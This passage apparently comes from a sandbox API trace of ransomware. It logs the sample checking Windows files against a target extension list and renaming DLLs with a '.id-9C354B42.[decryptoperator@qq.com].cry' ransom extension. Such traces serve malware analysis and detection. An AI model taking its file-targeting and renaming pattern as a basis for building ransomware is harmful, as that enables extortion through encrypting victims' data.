returned 3 [0052.531] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0052.531] lstrlenW (lpString=".dbf") returned 4 [0052.531] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0052.531] lstrlenW (lpString=".1cd") returned 4 [0052.531] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0052.531] lstrlenW (lpString=".jpg") returned 4 [0052.531] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0052.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0052.531] lstrlenW (lpString=".doc") returned 4 [0052.531] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.531] lstrlenW (lpString=".docx") returned 5 [0052.531] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.531] lstrlenW (lpString=".pdf") returned 4 [0052.531] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.531] lstrlenW (lpString=".xls") returned 4 [0052.532] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.532] lstrlenW (lpString=".xlsx") returned 5 [0052.532] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.532] lstrlenW (lpString=".ppt") returned 4 [0052.532] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.532] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0052.532] lstrlenW (lpString=".zip") returned 4 [0052.532] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.532] lstrlenW (lpString=".rar") returned 4 [0052.532] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.532] lstrlenW (lpString=".bz2") returned 4 [0052.532] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.532] lstrlenW (lpString=".7z") returned 3 [0052.532] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.532] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0052.532] lstrlenW (lpString=".dbf") returned 4 [0052.532] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.532] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0052.532] lstrlenW (lpString=".1cd") returned 4 [0052.532] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.532] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0052.532] lstrlenW (lpString=".jpg") returned 4 [0052.532] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.532] lstrcmpiW (lpString1=".exe", lpString2=".cry") returned 1 [0052.532] lstrlenW (lpString="ConvertInkStore.exe") returned 19 [0052.532] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0052.533] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=193024) returned 1 [0052.533] CloseHandle (hObject=0x1f4) returned 1 [0052.533] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe")) returned 0x20 [0052.533] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.533] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.533] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0052.533] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0052.533] lstrlenW (lpString=".doc") returned 4 [0052.533] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0052.533] lstrlenW (lpString=".docx") returned 5 [0052.533] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0052.533] lstrlenW (lpString=".pdf") returned 4 [0052.533] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0052.533] lstrlenW (lpString=".xls") returned 4 [0052.533] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0052.533] lstrlenW (lpString=".xlsx") returned 5 [0052.533] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0052.533] lstrlenW (lpString=".ppt") returned 4 [0052.533] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0052.533] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0052.533] lstrlenW (lpString=".zip") returned 4 [0052.533] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0052.533] lstrlenW (lpString=".rar") returned 4 [0052.533] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0052.533] lstrlenW (lpString=".bz2") returned 4 [0052.533] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0052.533] lstrlenW (lpString=".7z") returned 3 [0052.533] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0052.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0052.534] lstrlenW (lpString=".dbf") returned 4 [0052.534] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0052.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0052.534] lstrlenW (lpString=".1cd") returned 4 [0052.534] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0052.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0052.534] lstrlenW (lpString=".jpg") returned 4 [0052.534] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0052.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0052.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0052.534] lstrlenW (lpString=".doc") returned 4 [0052.534] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0052.534] lstrlenW (lpString=".docx") returned 5 [0052.534] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0052.534] lstrlenW (lpString=".pdf") returned 4 [0052.534] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0052.534] lstrlenW (lpString=".xls") returned 4 [0052.534] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0052.534] lstrlenW (lpString=".xlsx") returned 5 [0052.534] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0052.534] lstrlenW (lpString=".ppt") returned 4 [0052.534] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0052.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0052.534] lstrlenW (lpString=".zip") returned 4 [0052.534] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0052.534] lstrlenW (lpString=".rar") returned 4 [0052.534] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0052.534] lstrlenW (lpString=".bz2") returned 4 [0052.534] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0052.534] lstrlenW (lpString=".7z") returned 3 [0052.534] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0052.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0052.534] lstrlenW (lpString=".dbf") returned 4 [0052.534] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0052.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0052.534] lstrlenW (lpString=".1cd") returned 4 [0052.535] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0052.535] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0052.535] lstrlenW (lpString=".jpg") returned 4 [0052.535] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0052.535] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0052.535] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0052.535] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0052.535] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=3584) returned 1 [0052.535] CloseHandle (hObject=0x1f4) returned 1 [0052.535] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui")) returned 0x20 [0052.535] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.535] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.535] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0052.535] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0052.535] lstrlenW (lpString=".doc") returned 4 [0052.536] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.536] lstrlenW (lpString=".docx") returned 5 [0052.536] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.536] lstrlenW (lpString=".pdf") returned 4 [0052.536] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.536] lstrlenW (lpString=".xls") returned 4 [0052.536] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.536] lstrlenW (lpString=".xlsx") returned 5 [0052.536] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.536] lstrlenW (lpString=".ppt") returned 4 [0052.536] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0052.536] lstrlenW (lpString=".zip") returned 4 [0052.536] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.536] lstrlenW (lpString=".rar") returned 4 [0052.536] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.536] lstrlenW (lpString=".bz2") returned 4 [0052.536] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.536] lstrlenW (lpString=".7z") returned 3 [0052.536] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0052.536] lstrlenW (lpString=".dbf") returned 4 [0052.536] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0052.536] lstrlenW (lpString=".1cd") returned 4 [0052.536] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0052.536] lstrlenW (lpString=".jpg") returned 4 [0052.536] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0052.536] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0052.536] lstrlenW (lpString=".doc") returned 4 [0052.536] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.536] lstrlenW (lpString=".docx") returned 5 [0052.536] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.536] lstrlenW (lpString=".pdf") returned 4 [0052.536] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.537] lstrlenW (lpString=".xls") returned 4 [0052.537] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.537] lstrlenW (lpString=".xlsx") returned 5 [0052.537] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.537] lstrlenW (lpString=".ppt") returned 4 [0052.537] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0052.537] lstrlenW (lpString=".zip") returned 4 [0052.537] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.537] lstrlenW (lpString=".rar") returned 4 [0052.537] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.537] lstrlenW (lpString=".bz2") returned 4 [0052.537] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.537] lstrlenW (lpString=".7z") returned 3 [0052.537] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0052.537] lstrlenW (lpString=".dbf") returned 4 [0052.537] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0052.537] lstrlenW (lpString=".1cd") returned 4 [0052.537] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.537] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0052.537] lstrlenW (lpString=".jpg") returned 4 [0052.537] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.537] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0052.537] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0052.537] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0052.538] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=3584) returned 1 [0052.538] CloseHandle (hObject=0x1f4) returned 1 [0052.538] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui")) returned 0x20 [0052.539] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.539] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0052.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0052.539] lstrlenW (lpString=".doc") returned 4 [0052.539] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.539] lstrlenW (lpString=".docx") returned 5 [0052.539] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.539] lstrlenW (lpString=".pdf") returned 4 [0052.539] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.539] lstrlenW (lpString=".xls") returned 4 [0052.539] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.539] lstrlenW (lpString=".xlsx") returned 5 [0052.539] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.539] lstrlenW (lpString=".ppt") returned 4 [0052.539] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0052.539] lstrlenW (lpString=".zip") returned 4 [0052.539] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.539] lstrlenW (lpString=".rar") returned 4 [0052.539] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.539] lstrlenW (lpString=".bz2") returned 4 [0052.539] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.539] lstrlenW (lpString=".7z") returned 3 [0052.539] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0052.539] lstrlenW (lpString=".dbf") returned 4 [0052.539] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0052.539] lstrlenW (lpString=".1cd") returned 4 [0052.539] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0052.539] lstrlenW (lpString=".jpg") returned 4 [0052.539] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0052.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0052.540] lstrlenW (lpString=".doc") returned 4 [0052.540] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.540] lstrlenW (lpString=".docx") returned 5 [0052.540] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.540] lstrlenW (lpString=".pdf") returned 4 [0052.540] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.540] lstrlenW (lpString=".xls") returned 4 [0052.540] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.540] lstrlenW (lpString=".xlsx") returned 5 [0052.540] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.540] lstrlenW (lpString=".ppt") returned 4 [0052.540] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0052.540] lstrlenW (lpString=".zip") returned 4 [0052.540] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.540] lstrlenW (lpString=".rar") returned 4 [0052.540] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.540] lstrlenW (lpString=".bz2") returned 4 [0052.540] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.540] lstrlenW (lpString=".7z") returned 3 [0052.540] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0052.540] lstrlenW (lpString=".dbf") returned 4 [0052.540] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0052.540] lstrlenW (lpString=".1cd") returned 4 [0052.540] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0052.540] lstrlenW (lpString=".jpg") returned 4 [0052.540] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.540] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0052.540] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0052.541] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0052.627] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=4096) returned 1 [0052.627] CloseHandle (hObject=0x1f4) returned 1 [0052.627] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui")) returned 0x20 [0052.627] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.627] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0052.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0052.628] lstrlenW (lpString=".doc") returned 4 [0052.628] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.628] lstrlenW (lpString=".docx") returned 5 [0052.628] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.628] lstrlenW (lpString=".pdf") returned 4 [0052.628] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.628] lstrlenW (lpString=".xls") returned 4 [0052.628] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.628] lstrlenW (lpString=".xlsx") returned 5 [0052.628] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.628] lstrlenW (lpString=".ppt") returned 4 [0052.628] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0052.628] lstrlenW (lpString=".zip") returned 4 [0052.628] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.628] lstrlenW (lpString=".rar") returned 4 [0052.628] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.628] lstrlenW (lpString=".bz2") returned 4 [0052.628] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.628] lstrlenW (lpString=".7z") returned 3 [0052.628] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0052.628] lstrlenW (lpString=".dbf") returned 4 [0052.628] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0053.009] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0053.020] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0053.021] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0053.057] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.057] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.057] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0053.057] GetLastError () returned 0x0 [0053.057] ReadFile (in: hFile=0x220, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: 